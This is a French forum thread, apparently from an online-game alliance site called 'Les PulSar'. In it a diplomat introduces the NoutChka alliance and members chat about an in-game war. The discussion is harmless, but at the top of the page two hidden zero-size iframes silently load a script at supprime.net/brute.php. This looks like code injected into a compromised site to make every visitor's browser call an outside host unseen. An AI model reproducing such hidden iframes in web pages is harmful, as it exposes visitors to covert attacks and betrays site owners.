Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

AccueilDernières imagesRechercherS'enregistrerConnexion
Le Deal du moment : -17%
(Black Friday) Apple watch Apple SE GPS + Cellular ...
Voir le deal
249 €

Un Diplomate de passage

4 participants
AuteurMessage
Bichoco

Bichoco

Un Diplomate de passage Empty
MessageSujet: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeMar 16 Juin - 0:33

Salut à vous !!

Je me présente! Bichoco, Diplomate de l'alliance NoutChka et de sa Wing je viens par chez vous présenter notre alliance et faire connaissance avec vous

Bien amicalement... cheers
Revenir en haut Aller en bas
astyan

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeJeu 18 Juin - 12:40

bien le bonjour

preu chevalier
ilixa

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeJeu 18 Juin - 18:08

Bonjour à toi!

Quel est votre but réel?
Bichoco

Bichoco

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeMar 30 Juin - 14:23

Merci de votre accueil! Désolé pour l'attente j'étais très occupé niveau diplomatie ces derniers temps vous devez vous en douter Laughing maintenant que la guerre est lancée je n'ai plus grand chose à faire donc je continue ma balade inter-ally Very Happy

Nous n'avons que pour seul but que de nous amuser nous sommes une sacré bande on tape de gros délire sur skype on recycle on mine bref on joue dans la joie et la bonne humeur Wink

Bien amicalement,

Bichoco

ps: joli fofo Wink
Picasa
Admin
Picasa

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeMar 30 Juin - 17:32

Salut bichoco, merci pour le fofo Wink

Sinon votre guerre ça va ?
Bichoco

Bichoco

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitimeMer 1 Juil - 11:48

Laughing Guerre annulée lol!

Déjà qu'à la base elle n'avait pas de grande valeur , aujourd'hui elle n'en a plus du tout Laughing
Maintenant l'histoire n'est pas terminer on va se mettre dessus mais avec Bash lol!
Bref sinon tout vas bien cette histoire nous a réuni, c'est la tout le bénéfice qu'on en a tiré Very Happy

EDIT!!!

Guerre toujours en cours!!!!! lol!
C'est vraiment n'importe quoi Laughing
Tout ceux qui veulent s'inviter le peuvent apparemment pig
Ils ont déclaré aussi la guerre à la Wing dont le plus faible qui apparait quand même sur la liste est top 2400 Laughing ils ont vraiment pas honte lol!
Contenu sponsorisé

MessageSujet: Re: Un Diplomate de passage   Un Diplomate de passage Icon_minitime

Un Diplomate de passage
Page 1 sur 1